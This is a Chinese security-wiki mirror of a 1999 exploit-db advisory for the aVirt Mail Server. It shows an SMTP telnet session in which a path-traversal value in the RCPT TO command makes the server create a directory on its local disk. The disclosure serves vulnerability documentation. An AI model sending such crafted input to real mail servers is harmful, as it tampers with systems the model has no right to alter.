Avirt Gateway Suite 3.3/3.3 a/3.5 – Directory Creation

Avirt Gateway Suite 3.3/3.3 a/3.5 – Directory Creation

漏洞ID 1053420 漏洞类型
发布时间 1999-10-31 更新时间 1999-10-31
图片[1]-Avirt Gateway Suite 3.3/3.3 a/3.5 – Directory Creation-安全小百科CVE编号 N/A
图片[2]-Avirt Gateway Suite 3.3/3.3 a/3.5 – Directory Creation-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19589
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/764/info

The aVirt Mail Server has a weakness in the code that handles the RCPT TO command. By specifying a path in the command instead of an email recipient , an attacker could cause the mail server to create a directory in the server's local filesystem.

telnet targethost:25

> 220 server aVirt Mail SMTP Server Ready.
MAIL FROM: user
> 250 user, Sender OK
rcpt to:........createdir
> 250 ........createdir, Recipient OK
data
> 354 Please enter mail, ending with a "." on a line by itself
blablabla
.
> 250 Mail accepted.

This will cause the mail server to create a root directory called "createdir", which will contain 1 file. Testing indicates that this method cannot be used to overwrite existing folders.

相关推荐: Vixie Cron Buffer Overflow Vulnerability

Vixie Cron Buffer Overflow Vulnerability 漏洞ID 1104602 漏洞类型 Boundary Condition Error 发布时间 1999-08-25 更新时间 1999-08-25 CVE编号 N/A CNNV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享